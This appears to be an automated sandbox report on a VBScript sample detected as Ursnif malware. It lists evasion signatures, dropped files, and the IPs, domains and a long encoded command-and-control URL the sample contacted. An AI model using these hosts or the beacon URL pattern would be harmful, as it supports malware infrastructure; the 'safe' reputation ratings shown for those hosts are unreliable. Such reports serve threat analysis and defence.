Source: Yara match File source: 00000007.00000003.841100047.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY

Behavior Graph (ID: 331433, Sample: view_attach_72559.vbs, Startdate: 16/12/2020, Architecture: WINDOWS, Score: 84)

Top-level signatures: Yara detected Ursnif; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function).
wscript.exe (started): contacts iplogger.org (88.99.66.31, port 443, HETZNER-ASDE, Germany); drops C:\Users\user\AppData\Local\Temp\Oxnard.rb (PE32) and C:\Users\user\AppData\Local\...\prestige.zip (Zip); signatures: System process connects to network (likely due to code injection or exploit), Benign windows process drops PE files, VBScript performs obfuscated calls to suspicious functions, 2 other signatures.
iexplore.exe (started) -> child iexplore.exe: contacts golang.feel500.at (46.173.218.93, port 80, GARANT-PARK-INTERNETRU, Russian Federation).

Contacted Public IPs

IP             Domain   Country             ASN    ASN Name                Malicious
46.173.218.93  unknown  Russian Federation  47196  GARANT-PARK-INTERNETRU  false
88.99.66.31    unknown  Germany             24940  HETZNER-ASDE            false

Contacted Domains

Name               IP             Active
iplogger.org       88.99.66.31    true
golang.feel500.at  46.173.218.93  true

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://golang.feel500.at/favicon.ico | false | Avira URL Cloud: safe | unknown
http://golang.feel500.at/api1/DIwBQ8Rv7j7xfqFjg4_2BA9/g0fzfaOWqj/Y_2BPGiAPfzGcs2Be/I_2BUuYEc0ea/KBkab56Bm_2/FWmqnzUOX9_2B0/YbRWfB6IMq7TSr21K5FNM/xWmFuq_2FeEONGMO/1ZuPh_2FNFAeM3T/FM11WlspOeJ_2FqYpl/U_2F6jwXu/YXiyreYoS1UAkST_2FVa/JT_2Fx9W7QvoG6HJsdC/ExFIoNdpiPpyKG7cmJGp40/huNnlqBJ9uVVH/QyyRFE1b/30os8htaDb_2FAitT_2BOsm/SKMxwp3_0A/_0DyvsrFrDpoMB3eg/_2BPhnWhGFuU/FPA93GCv8Zd/FBoszW1uVg1_2B/gtKiRyRf4RAjLF4_2F0P1/_2FR | false | Avira URL Cloud: safe | unknown